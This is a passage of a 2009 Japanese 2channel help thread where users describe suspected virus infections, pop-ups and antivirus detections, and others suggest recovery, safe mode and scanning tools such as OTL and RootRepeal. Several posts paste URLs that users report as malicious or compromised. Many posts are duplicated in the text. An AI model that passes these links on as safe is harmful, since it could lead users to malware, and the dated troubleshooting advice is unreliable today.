これ自体はノートン関連のファイルという事がわかっているのですが、問題はこのエラーが表示された際に必ずセットで表示される、以下の画像のエラーです。
http://up2.viploader.net/pic/src/viploader1148679.jpg
「ccSvcHstプログラムの終了中です」が表示されずにすんなりと終了する時には表示されません。
必ずccSvcHstとセットになっています。
自分なりに調べてみたところn.exeはUSBウイルスだと分かったのですが、
・フォルダの設定で隠しファイルはちゃんと表示できる
・各ドライブ直下にautorun.infが無い
・Cドライブ直下にn.exeやvb8jc.exeなどが無い
など、感染している症状は見当たりませんでした。
また、PCにインストールしているノートンインターネットセキュリティ2009と
カスペルキーのオンラインスキャンを実行しましたがウイルスは発見できませんでした。
症状としては感染しているようには見えないのですが、どうしても『n』というプログラムが気になります。
これはウイルスではないのでしょうか?またウイルスだった場合、手動での確認が不可能な段階まで進行しているのでしょうか?
不安でご飯も3杯しか喉を通りません助けてください。
115 :名無しさん@お腹いっぱい。:2009/08/27(木) 10:05:32
"n"ってのは必ずしもファイル名とは限らないんじゃね?
さっさとリカバリしちゃったほうが確実だしご飯がすすむと思うよ。
さっさとリカバリしちゃったほうが確実だしご飯がすすむと思うよ。
116 :名無しさん@お腹いっぱい。:2009/08/27(木) 14:03:06
JS:ScriptIP-inf [Trj]
これ何か知ってる?
ネサフしてるとavastが何回も拾う
が、データベースに載ってもいない
これ何か知ってる?
ネサフしてるとavastが何回も拾う
が、データベースに載ってもいない
117 :名無しさん@お腹いっぱい。:2009/08/29(土) 18:58:50
今VAIOtypePをスタンバイから復帰させたんだけど、
その瞬間緑とオレンジのブロックが左に流れ続ける画面になってしまった。
fとかoとかがそのブロックの中に入ってたんだけど、
再起動したら戻った・・・
これってウィルス?とりあえず今からスキャンしてみる・・・
その瞬間緑とオレンジのブロックが左に流れ続ける画面になってしまった。
fとかoとかがそのブロックの中に入ってたんだけど、
再起動したら戻った・・・
これってウィルス?とりあえず今からスキャンしてみる・・・
118 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 09:24:44
【使用OS】 「win2k_SP4」(多分)
【Microsoft Update(MU)の状態】 08/30現時点・最新
【使用セキュリティソフトとバージョン】 「AVG フリー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Downloader.Generic8.BKDE
」
トロイってことしか分からない。 危険度は恐らく低いが情報求む。
ちなみに、検出されたのは「Orbit」ってDL支援ソフトの「〜net.exe」
〜←なんて書いてあったか隔離した記録ごと消したから忘れてしまった。
【Microsoft Update(MU)の状態】 08/30現時点・最新
【使用セキュリティソフトとバージョン】 「AVG フリー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Downloader.Generic8.BKDE
」
トロイってことしか分からない。 危険度は恐らく低いが情報求む。
ちなみに、検出されたのは「Orbit」ってDL支援ソフトの「〜net.exe」
〜←なんて書いてあったか隔離した記録ごと消したから忘れてしまった。
119 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 09:44:20
XP使っているのですが、(それ以外よくわかりません)
1ヶ月ぐらい前にブラウザのバーが勝手に上がり下がりして変でした。
今度は、電源が勝手に消えて着いたりして、主電源も効かなくなるので
ウイルスバスターを入れてみました。
ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて、
ウイルスバスターで29個の何かが検出されたのですが、
これがウイルスですか?
こういうのが、PCを壊すことはあるのでしょうか?
1ヶ月ぐらい前にブラウザのバーが勝手に上がり下がりして変でした。
今度は、電源が勝手に消えて着いたりして、主電源も効かなくなるので
ウイルスバスターを入れてみました。
ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて、
ウイルスバスターで29個の何かが検出されたのですが、
これがウイルスですか?
こういうのが、PCを壊すことはあるのでしょうか?
120 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 19:04:56
>>119
> ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて
アンチウイルス入れないで数年使えば、どんな状態になっていてもおかしくない
あなたの言う症状がウイルスのせいか何なのか断定は出来ないが、もうまともなpcの状態じゃないと思う
> ウイルスソフトを入れると、起動が鈍くなるのでここ数年入れていなくて
アンチウイルス入れないで数年使えば、どんな状態になっていてもおかしくない
あなたの言う症状がウイルスのせいか何なのか断定は出来ないが、もうまともなpcの状態じゃないと思う
121 :名無しさん@お腹いっぱい。:2009/08/30(日) 22:02:29
122 :名無しさん@お腹いっぱい。:2009/08/30(日) 22:41:55
>>120
>>121
ありがとうございます。
電源落ちはなくなりましたが、また調子悪くなるかもしれないので、
データーだけ取ってからリカバリに挑戦してみます。
ウイルスソフトが大切だとはじめて思いました。
(数年ってもう10年近いです)
私は絶対にウイルスになんて感染しないって自信過剰でした。
>>121
ありがとうございます。
電源落ちはなくなりましたが、また調子悪くなるかもしれないので、
データーだけ取ってからリカバリに挑戦してみます。
ウイルスソフトが大切だとはじめて思いました。
(数年ってもう10年近いです)
私は絶対にウイルスになんて感染しないって自信過剰でした。
123 :名無しさん@お腹いっぱい。:2009/08/31(月) 03:47:32
OS XP
対策ソフト一切無しで、エッチ系サイト閲覧してたら、急にダウンロードとセットアップが始まってしまいました。
アンインストールしたけど
ネットしてたら、別ウィンドウで知らないサイトが、ピョコピョコ出るように、なりました。
Yahooメールとか見てたら頻繁に
ヤフオクのID即止めた方が良いですか?
キャノンのウイルス対策ソフトの1ヶ月体験インストールしてみたけど、感染ファイル46個削除になったけど
知らないサイトがピョコピョコは解消されません
ウイルスバスターも、入れてみたら、激重になって
何も出来ません。
助けて下さい。
対策ソフト一切無しで、エッチ系サイト閲覧してたら、急にダウンロードとセットアップが始まってしまいました。
アンインストールしたけど
ネットしてたら、別ウィンドウで知らないサイトが、ピョコピョコ出るように、なりました。
Yahooメールとか見てたら頻繁に
ヤフオクのID即止めた方が良いですか?
キャノンのウイルス対策ソフトの1ヶ月体験インストールしてみたけど、感染ファイル46個削除になったけど
知らないサイトがピョコピョコは解消されません
ウイルスバスターも、入れてみたら、激重になって
何も出来ません。
助けて下さい。
124 :名無しさん@お腹いっぱい。:2009/08/31(月) 05:09:14
まずアンチウイルスソフトを複数入れるのは止めろ。
体験版の多くはスキャンのみで駆除できないことがあるから、体験版を過信するのは大きな間違い。
つかバスターはザルのくせして激重だ。
それとPCにダウンロードされたのはブラウザハイジャック型のマルウエアとバックドアだと思う。
Yahoo IDや様々なネットサービスを一旦全て停止し、マルウエアやスパイウエアを駆除するソフトをインストールして、定義ファイルをUpdate後にスキャンしてみるといいよ。
SUPERAntispywareだとブラウザハイジャック防止機能もあるからオススメ。
体験版の多くはスキャンのみで駆除できないことがあるから、体験版を過信するのは大きな間違い。
つかバスターはザルのくせして激重だ。
それとPCにダウンロードされたのはブラウザハイジャック型のマルウエアとバックドアだと思う。
Yahoo IDや様々なネットサービスを一旦全て停止し、マルウエアやスパイウエアを駆除するソフトをインストールして、定義ファイルをUpdate後にスキャンしてみるといいよ。
SUPERAntispywareだとブラウザハイジャック防止機能もあるからオススメ。
125 :名無しさん@お腹いっぱい。:2009/08/31(月) 09:21:30
>>124
ご回答ありがとうございます。
ウイルスバスターが激重で、アンインストールするのにも、即フリーズして何も出来ないんですが
修理に出した方が早いですか?
F5押しながら再起動してみたけど
フリーズ
二つの体験版が起動してすぐ動いてるからだろうけど
何か、ウイルスバスターアンインストール出来る方法ありましたら、教えて下さい。
データのバックアップも出来ません。
ご回答ありがとうございます。
ウイルスバスターが激重で、アンインストールするのにも、即フリーズして何も出来ないんですが
修理に出した方が早いですか?
F5押しながら再起動してみたけど
フリーズ
二つの体験版が起動してすぐ動いてるからだろうけど
何か、ウイルスバスターアンインストール出来る方法ありましたら、教えて下さい。
データのバックアップも出来ません。
126 :名無しさん@お腹いっぱい。:2009/08/31(月) 10:03:19
ここはいつから初心者板になったんだろう
>>123
いいか?念の為LANケーブル引っこ抜いて、セーフモードで立ち上げて
そこからアンインストール作業を試して見てダメだったら、リカバリCDでも突っ込んでから起動するんだな。
今出てきた言葉で分からない事があるならネットカフェでググるなり、本屋か図書館に行ってパソコン用語辞典調べるなりしな
即リカバリをすると無論バックアップは取れないが、自業自得だ
みんな調べたり、痛い思いしながら相応に育ってるんだ
本一冊買えば基礎知識くらいは付くんだから、それくらいしてからPCいじって欲しい
>>123
いいか?念の為LANケーブル引っこ抜いて、セーフモードで立ち上げて
そこからアンインストール作業を試して見てダメだったら、リカバリCDでも突っ込んでから起動するんだな。
今出てきた言葉で分からない事があるならネットカフェでググるなり、本屋か図書館に行ってパソコン用語辞典調べるなりしな
即リカバリをすると無論バックアップは取れないが、自業自得だ
みんな調べたり、痛い思いしながら相応に育ってるんだ
本一冊買えば基礎知識くらいは付くんだから、それくらいしてからPCいじって欲しい
127 : ◆N9P3SuvBPo :2009/09/01(火) 01:48:06
経験に勝る知識はない。
128 :名無しさん@お腹いっぱい。:2009/09/01(火) 07:52:03
129 :名無しさん@お腹いっぱい。:2009/09/01(火) 18:36:10
xp ウイルスバスターver2009 troj_generic.dit が検出されました。
IE5というフォルダ(?)にあると表示されましたが、フォルダオプションで
全てを表示させても見当たりません。
害の有無・削除方法など、教えてください。
バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
IE5というフォルダ(?)にあると表示されましたが、フォルダオプションで
全てを表示させても見当たりません。
害の有無・削除方法など、教えてください。
バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
130 :名無しさん@お腹いっぱい。:2009/09/01(火) 18:55:54
インターネット一時ファイルを削除
131 : ◆N9P3SuvBPo :2009/09/01(火) 20:53:45
>128
ページ内に<p class="img"><iframe frameBorder="0" allowTransparency=以下ryがあり
そのコードに反応してるんでは?と思います。
ページ内に<p class="img"><iframe frameBorder="0" allowTransparency=以下ryがあり
そのコードに反応してるんでは?と思います。
132 :名無しさん@お腹いっぱい。:2009/09/02(水) 05:43:11
ウィルスに感染したらどうすればいいですかね
133 :名無しさん@お腹いっぱい。:2009/09/02(水) 06:52:55
リカバリ
135 :名無しさん@お腹いっぱい。:2009/09/02(水) 10:50:32
最近のゆとりーはマルチって言葉すら知らないのだろうか?と素朴な疑問
136 :名無しさん@お腹いっぱい。:2009/09/02(水) 12:10:10
マルチ市ねって言っても帰ってくれないでしょ、この手の奴は
137 :名無しさん@お腹いっぱい。:2009/09/02(水) 12:13:19
あと、マルチだって言われてるのに相手するバカもいるからね
自演かもしれないけど
自演かもしれないけど
138 :名無しさん@お腹いっぱい。:2009/09/02(水) 12:45:59
>>135-137
マルチ言及厨のほうがウザ
>バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
丁寧に説明してるからまだいいかと。
マルチ言及厨のほうがウザ
>バスタースレでは、「サポートに聞け」と、スレ存在の価値が皆無のようなことを
言われまして、こちらに来ました。よろしくお願いします。
丁寧に説明してるからまだいいかと。
139 :名無しさん@お腹いっぱい。:2009/09/02(水) 12:51:36
という自演
140 :名無しさん@お腹いっぱい。:2009/09/02(水) 13:18:49
はいさらっと終わらして次いこーぜー
141 :名無しさん@お腹いっぱい。:2009/09/04(金) 04:24:58
画面が時々フリーズして困っています。
特徴はフリーズした瞬間「バイーン」と音がします。
スパイウェアを仕込まれたのでしょうか?
これが何か分かる方おしえてください。
特徴はフリーズした瞬間「バイーン」と音がします。
スパイウェアを仕込まれたのでしょうか?
これが何か分かる方おしえてください。
142 :名無しさん@お腹いっぱい。:2009/09/05(土) 12:43:22
田代ウイルスっていうのは、田代砲のことなんですか?
イメージファイルをDVDに焼いてマウントしたら、ドライブにnamikare.netと表示されて、
自動実行の直前で食い止めたんですが、もし感染したらどんな症状がでるのでしょう?
イメージファイルをDVDに焼いてマウントしたら、ドライブにnamikare.netと表示されて、
自動実行の直前で食い止めたんですが、もし感染したらどんな症状がでるのでしょう?
143 :名無しさん@お腹いっぱい。:2009/09/06(日) 19:15:46
パソコンのウィルスを作って、バラまいたら、
どういう法律に触れるのでしょうか?
どういう法律に触れるのでしょうか?
144 :名無しさん@お腹いっぱい。:2009/09/06(日) 23:16:28
初心者です。(※一応ウィルスバスター付)
ネットの履歴に
・r・・・s・・・[・^
というものがあり、行った覚えが無いのですがこれは何かのウィルスなのでしょうか?
気付いたら履歴に残っており、同時期から急に動作異常が発生しています。
もしご存知でしたら名称と対策をお願い致します。
ネットの履歴に
・r・・・s・・・[・^
というものがあり、行った覚えが無いのですがこれは何かのウィルスなのでしょうか?
気付いたら履歴に残っており、同時期から急に動作異常が発生しています。
もしご存知でしたら名称と対策をお願い致します。
145 :八頭 ◆YAGApwSaEw :2009/09/07(月) 01:06:36
>>144
それだけではなんともいえないが
INTERNET Watch
情報処理推進機構(IPA)は3日、ブラウザの設定を改変したり、不正な機能を追加する 2009/9/3
悪質なソフトウェア「ブラウザハイジャッカー」の被害が出ているとして注意喚起した
ttp://internet.watch.impress.co.jp/docs/news/20090903_312726.html
→ PC健康診断掲示板 (特にPCに問題は感じないが念のためチェックしてほしい方向けの診察掲示板)
http://pc11.2ch.net/test/read.cgi/sec/1250027233/5
それだけではなんともいえないが
INTERNET Watch
情報処理推進機構(IPA)は3日、ブラウザの設定を改変したり、不正な機能を追加する 2009/9/3
悪質なソフトウェア「ブラウザハイジャッカー」の被害が出ているとして注意喚起した
ttp://internet.watch.impress.co.jp/docs/news/20090903_312726.html
→ PC健康診断掲示板 (特にPCに問題は感じないが念のためチェックしてほしい方向けの診察掲示板)
http://pc11.2ch.net/test/read.cgi/sec/1250027233/5
146 :名無しさん@お腹いっぱい。:2009/09/11(金) 01:34:40
Janeで2ちゃんねる見てるのですが
プロバイダ板の
「MX・ny等で帯域制限をかけるISPについて云々」
というスレを開いたら
トロイの木馬が検出されました。
スレッドを開くだけでウイルス感染する事なんてあるんでしょうか?
プロバイダ板の
「MX・ny等で帯域制限をかけるISPについて云々」
というスレを開いたら
トロイの木馬が検出されました。
スレッドを開くだけでウイルス感染する事なんてあるんでしょうか?
147 :名無しさん@お腹いっぱい。:2009/09/11(金) 10:42:43
帰れ
148 :名無しさん@お腹いっぱい。:2009/09/11(金) 21:41:39
家のPCが突然シャットダウンしたり一時的にインターネットに接続出来なく
なります。
他にもタブが突然増えだしたりシャットダウン出来なくなってしまいます。
一応ウイルスドクターを入れていてスキャンをしてもウィルスは検出されません。
これはPCに何か問題があるのでしょうか?
それともウィルスが入っているのでしょうか。
なります。
他にもタブが突然増えだしたりシャットダウン出来なくなってしまいます。
一応ウイルスドクターを入れていてスキャンをしてもウィルスは検出されません。
これはPCに何か問題があるのでしょうか?
それともウィルスが入っているのでしょうか。
149 :名無しさん@お腹いっぱい。:2009/09/12(土) 00:29:10
>>148
テンプレートは飾りではないのです。
>>1はまともなレスがほしいがひとが利用するテンプレ。
>>2-3は予防のについて
>>5-6はルータ無し且つリカバリした状態がXPsp1以前なら感染するマルウエア。
>>9はおまいさんの疑問への答え。
テンプレートは飾りではないのです。
>>1はまともなレスがほしいがひとが利用するテンプレ。
>>2-3は予防のについて
>>5-6はルータ無し且つリカバリした状態がXPsp1以前なら感染するマルウエア。
>>9はおまいさんの疑問への答え。
150 :名無しさん@お腹いっぱい。:2009/09/18(金) 17:56:21
【使用OS】 「Windows Vista (TM) Business Professional (6.0, Build 6002 Service Pack 2)」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast4/BitDefenderコマンドライン版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「WindowsDefender」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無」
いつの間にか、HDD内の画像サイズの比率が滅茶苦茶になっていました。
自分でコンバートした覚えもなく、思い当たる点もありません。
フルスキャンしましたが何も検知されませんでした。
もし、HDD内の画像ファイルを破壊するようなウイルスがあったら教えてくださいm(_ _)m
サンプル↓
ttp://imagepot.net/view/125326414004.jpg
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast4/BitDefenderコマンドライン版」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「WindowsDefender」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「無」
いつの間にか、HDD内の画像サイズの比率が滅茶苦茶になっていました。
自分でコンバートした覚えもなく、思い当たる点もありません。
フルスキャンしましたが何も検知されませんでした。
もし、HDD内の画像ファイルを破壊するようなウイルスがあったら教えてくださいm(_ _)m
サンプル↓
ttp://imagepot.net/view/125326414004.jpg
151 :名無しさん@お腹いっぱい。:2009/09/18(金) 22:24:26
152 :名無しさん@お腹いっぱい。:2009/09/19(土) 00:08:26
梨花のオフィシャルブログを見るとadode readerが勝手に開いて、ファイルが壊れてると出て
ノートンが高リスクと表示されます。なんなんでしょうか?分かる方いらっしゃいますか?
このページです
ttp://www.smooche.jp/rinka/
ノートンが高リスクと表示されます。なんなんでしょうか?分かる方いらっしゃいますか?
このページです
ttp://www.smooche.jp/rinka/
153 :名無しさん@お腹いっぱい。:2009/09/19(土) 00:11:44
>>152
エラーで表示されない
エラーで表示されない
154 :名無しさん@お腹いっぱい。:2009/09/19(土) 00:16:56
155 :名無しさん@お腹いっぱい。:2009/09/19(土) 00:22:14
156 :名無しさん@お腹いっぱい。:2009/09/19(土) 00:26:08
157 : ◆N9P3SuvBPo :2009/09/19(土) 01:04:18
>156
AVG7.5でも反応あり
あとソースを見ようとすると再びAVGが反応するので、ソースチェッカーオンラインというのを使い、
調べて見ますと、IFrameタグで悪質サイトに飛ばせようとします。
またジャンプタグで別サイトを呼びこむ仕掛けもあります。
AVG7.5でも反応あり
あとソースを見ようとすると再びAVGが反応するので、ソースチェッカーオンラインというのを使い、
調べて見ますと、IFrameタグで悪質サイトに飛ばせようとします。
またジャンプタグで別サイトを呼びこむ仕掛けもあります。
158 :名無しさん@お腹いっぱい。:2009/09/19(土) 01:13:17
>>157
レスありがとうございます。それと、ご親切に有難う。詳細が分かりましたら、教えてください。
genoウイルスってやつかな・・・。ノートンで一応「遮断しました」とは出たんですが、大丈夫かな。。
レスありがとうございます。それと、ご親切に有難う。詳細が分かりましたら、教えてください。
genoウイルスってやつかな・・・。ノートンで一応「遮断しました」とは出たんですが、大丈夫かな。。
159 :八頭 ◆YAGApwSaEw :2009/09/19(土) 01:49:00
>>158
シマへ報告しといたからダイジョブ
シマへ報告しといたからダイジョブ
160 :名無しさん@お腹いっぱい。:2009/09/19(土) 02:08:44
>>159
有難うございます
有難うございます
161 :名無しさん@お腹いっぱい。:2009/09/22(火) 20:22:30
162 :名無しさん@お腹いっぱい。:2009/09/22(火) 20:32:34
うん
163 :名無しさん@お腹いっぱい。:2009/09/23(水) 00:19:37
【使用OS】 Windows XP
【Microsoft Update(MU)の状態】 多分手動
【使用セキュリティソフトとバージョン】 ウィルスセキュリティZERO
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 自動更新なので多分
【スパイウェア対策ソフト】 同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】 同上
【ルータの有無】 多分ある
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャン中
友人からMSNメッセンジャーで送りつけられた変なURLを踏んでしまい、
自分もメッセンジャー経由で他人にURLをばら撒くようになってしまいました。
自分がばら撒いたことは自分ではわかりません。
その時のメッセージは
-------------------------------------------
○○の発言 :
Obama http://オバマwebcam.com/
-------------------------------------------
(オバマ → obama)
といったものだったと思います。
このURLでググっても日本語サイトが出てこないため、対策がわかりません。
どなたか、よろしくお願いします。
【Microsoft Update(MU)の状態】 多分手動
【使用セキュリティソフトとバージョン】 ウィルスセキュリティZERO
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 自動更新なので多分
【スパイウェア対策ソフト】 同上
【スパイウェア対策ソフトの更新は定期的に行なっているか】 同上
【ルータの有無】 多分ある
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャン中
友人からMSNメッセンジャーで送りつけられた変なURLを踏んでしまい、
自分もメッセンジャー経由で他人にURLをばら撒くようになってしまいました。
自分がばら撒いたことは自分ではわかりません。
その時のメッセージは
-------------------------------------------
○○の発言 :
Obama http://オバマwebcam.com/
-------------------------------------------
(オバマ → obama)
といったものだったと思います。
このURLでググっても日本語サイトが出てこないため、対策がわかりません。
どなたか、よろしくお願いします。
164 :名無しさん@お腹いっぱい。:2009/09/23(水) 16:08:03
クリーンインストール
165 :名無しさん@お腹いっぱい。:2009/09/24(木) 02:01:21
PC初心者です。携帯から失礼します
【使用OS】 WindowsVista
【症状】 tora3aux.exeが認証を求めています。の表示が下の黒いバーに出てる。
ファイルは怖くて開いてないんで、被害は無く、自動アップデートには失敗してくれるんで大丈夫なんですが、トロイですよね?
消したいんですが、どうすればいいんでしょうか?
【使用OS】 WindowsVista
【症状】 tora3aux.exeが認証を求めています。の表示が下の黒いバーに出てる。
ファイルは怖くて開いてないんで、被害は無く、自動アップデートには失敗してくれるんで大丈夫なんですが、トロイですよね?
消したいんですが、どうすればいいんでしょうか?
166 :名無しさん@お腹いっぱい。:2009/09/24(木) 04:03:47
Windows,vistaで画面の下にある黒いバーの部分に「tora3aux,exeがアクセス許可を求... - Yahoo!知恵袋
167 :名無しさん@お腹いっぱい。:2009/09/24(木) 10:29:58
168 :名無しさん@お腹いっぱい。:2009/10/05(月) 00:45:54
169 :名無しさん@お腹いっぱい。:2009/10/05(月) 01:25:04
http://futabakikaku.com/mrlite/include/config/conf/184.htm
↑
これウイルス仕込まれてたページみたいなんだけど、
踏んだとき404エラーになっててもウイルスって感染するのかな?
↑
これウイルス仕込まれてたページみたいなんだけど、
踏んだとき404エラーになっててもウイルスって感染するのかな?
170 :名無しさん@お腹いっぱい。:2009/10/05(月) 01:45:11
>>168
いわゆるブラクラ。 大量にFLASH再生が立ち上がってPCの動作がおかしくなる。(ウイルスは仕込まれて無いっぽい。)
とりあえずGoogle SafeBrowsingに攻撃サイトとして報告しておいた。
>>169
普通は感染しない。(そのページは現在本当に404)
ただし、ちょっと前に、404のページに見せかけて裏で隠して攻撃コード仕込むサイトがMDLに載っていたので、
404に見えるからって安心できない。
# こういう心理の落とし穴を使うタイプ(表示が404だから裏で起きていることを警戒しないタイプ)は凄いタチ悪いと思う...orz
いわゆるブラクラ。 大量にFLASH再生が立ち上がってPCの動作がおかしくなる。(ウイルスは仕込まれて無いっぽい。)
とりあえずGoogle SafeBrowsingに攻撃サイトとして報告しておいた。
>>169
普通は感染しない。(そのページは現在本当に404)
ただし、ちょっと前に、404のページに見せかけて裏で隠して攻撃コード仕込むサイトがMDLに載っていたので、
404に見えるからって安心できない。
# こういう心理の落とし穴を使うタイプ(表示が404だから裏で起きていることを警戒しないタイプ)は凄いタチ悪いと思う...orz
171 :名無しさん@お腹いっぱい。:2009/10/05(月) 01:53:42
172 :名無しさん@お腹いっぱい。:2009/10/05(月) 02:04:31
>>171
とりあえず、私が見た時点(1:40頃)は何もなかった。ので、私とそれ程変わらない時間に見たんなら
大丈夫(感染してない)だと思う。
まあ、こういうのって心配しはじめるとキリが無いんだけどね。(w 心配ならシマンテックとかマカフィー,
カスペルスキーとかのオンラインスキャンをやっておけばいいと思う。
※ 自分が使っていないソフト会社のオンラインスキャンをするのが良い。
とりあえず、私が見た時点(1:40頃)は何もなかった。ので、私とそれ程変わらない時間に見たんなら
大丈夫(感染してない)だと思う。
まあ、こういうのって心配しはじめるとキリが無いんだけどね。(w 心配ならシマンテックとかマカフィー,
カスペルスキーとかのオンラインスキャンをやっておけばいいと思う。
※ 自分が使っていないソフト会社のオンラインスキャンをするのが良い。
173 :名無しさん@お腹いっぱい。:2009/10/05(月) 02:08:27
174 :名無しさん@お腹いっぱい。:2009/10/05(月) 02:18:14
私もtp://www.amigo.in/hahahahahaha/oppai.html 踏んじゃいました・・・
一瞬表示されてすぐに消したんだけど・・・
今のところPCは動いてるんだけど、兄のPCなんで壊したら叱られちゃう
一瞬表示されてすぐに消したんだけど・・・
今のところPCは動いてるんだけど、兄のPCなんで壊したら叱られちゃう
175 :初心者:2009/10/05(月) 19:22:47
【使用OS】 「SP3」
【Microsoft Update(MU)の状態】 「on」
【使用セキュリティソフトとバージョン】 「AVG8.5420」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「SuperAntiSpyware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「?」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トロイなんたら。
パニくって反射的に削除してしまいました。
再スキャンしたら、大丈夫でした。
ニフティのオンラインスキャンしたら、ウィルスを一つ検出しました。
用心のために、リカバリしたほうがいいでしょうか?
気がつかないでショッピングサイトにログイン
(退会するためでしたが)したのが怖いです。
マイドキュメントのファイル、読まれてしまったかな・・・。
【Microsoft Update(MU)の状態】 「on」
【使用セキュリティソフトとバージョン】 「AVG8.5420」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「SuperAntiSpyware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「?」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トロイなんたら。
パニくって反射的に削除してしまいました。
再スキャンしたら、大丈夫でした。
ニフティのオンラインスキャンしたら、ウィルスを一つ検出しました。
用心のために、リカバリしたほうがいいでしょうか?
気がつかないでショッピングサイトにログイン
(退会するためでしたが)したのが怖いです。
マイドキュメントのファイル、読まれてしまったかな・・・。
176 :175:2009/10/05(月) 19:25:40
すいません、常時AVGを使っていて、
ニフティのオンラインスキャンしたらいつ出たってことです。
AVGのバカ。
ニフティのオンラインスキャンしたらいつ出たってことです。
AVGのバカ。
177 :175:2009/10/05(月) 19:26:58
ニフティのオンラインスキャンは、カスペルスキーです。
パニ食っててすいません。
パニ食っててすいません。
178 :名無しさん@お腹いっぱい。:2009/10/05(月) 19:34:20
179 :175:2009/10/05(月) 19:50:23
180 :名無しさん@お腹いっぱい。:2009/10/06(火) 23:13:20
【使用OS】XP
【Microsoft Update(MU)の状態】手動
【使用セキュリティソフトとバージョン】ノートン
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】いいえ
【スパイウェア対策ソフト】ad-aware spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】わかりません
スキャンした結果、トロイの木馬が3つ見つかり、削除済みです。
しかしttp://188.165.18.19/ads/?aff=6&subaff=123-v302
が頻繁に勝手に開かれるという症状は改善されません。
alertfindやcanfind等のサイトも勝手に開かれているみたいです。
ネット等で調べましたが、対処方法がわかりません。
よろしくお願いします。
【Microsoft Update(MU)の状態】手動
【使用セキュリティソフトとバージョン】ノートン
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】いいえ
【スパイウェア対策ソフト】ad-aware spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】わかりません
スキャンした結果、トロイの木馬が3つ見つかり、削除済みです。
しかしttp://188.165.18.19/ads/?aff=6&subaff=123-v302
が頻繁に勝手に開かれるという症状は改善されません。
alertfindやcanfind等のサイトも勝手に開かれているみたいです。
ネット等で調べましたが、対処方法がわかりません。
よろしくお願いします。
181 :名無しさん@お腹いっぱい。:2009/10/06(火) 23:25:33
mixiのウイルスって未だに活動してんの?
さっきいつもどおりにログインしようとしたらカスペさんが「やばいっすよ」と教えてくれた
まさか新種じゃないよね?
さっきいつもどおりにログインしようとしたらカスペさんが「やばいっすよ」と教えてくれた
まさか新種じゃないよね?
182 :八頭 ◆YAGApwSaEw :2009/10/06(火) 23:27:37
>>180
●IPA 情報処理推進機構
「 USB メモリのセキュリティ対策を意識していますか? 」 Windowsの自動実行(オートラン)機能を無効にする
※USBメモリの使用に関わらず設定しておくこと!
ttp://www.ipa.go.jp/security/txt/2009/05outline.html
http://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行
左列下部にある「Extra Registry」箇所をUse Safelistにチェックを入れて、
上段にある「Scan All Users」の箇所にチェックを入れてから、左上の「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.txt」がメモ帳で開いて、デスクトップ上にテキストで自動的に保存されています
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストで自動的に保存されています
RootRepeal
http://rootrepeal.googlepages.com/
RootRepealの最新バージョン(The latest version)をデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブです)
ログ抽出走査が終了すると、
「RootRepeal report 月-日-09 (×-×-×).txt」がメモ帳で開いて、C:にテキストで自動的に保存されています
●IPA 情報処理推進機構
「 USB メモリのセキュリティ対策を意識していますか? 」 Windowsの自動実行(オートラン)機能を無効にする
※USBメモリの使用に関わらず設定しておくこと!
ttp://www.ipa.go.jp/security/txt/2009/05outline.html
http://oldtimer.geekstogo.com/OTL.exe
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行
左列下部にある「Extra Registry」箇所をUse Safelistにチェックを入れて、
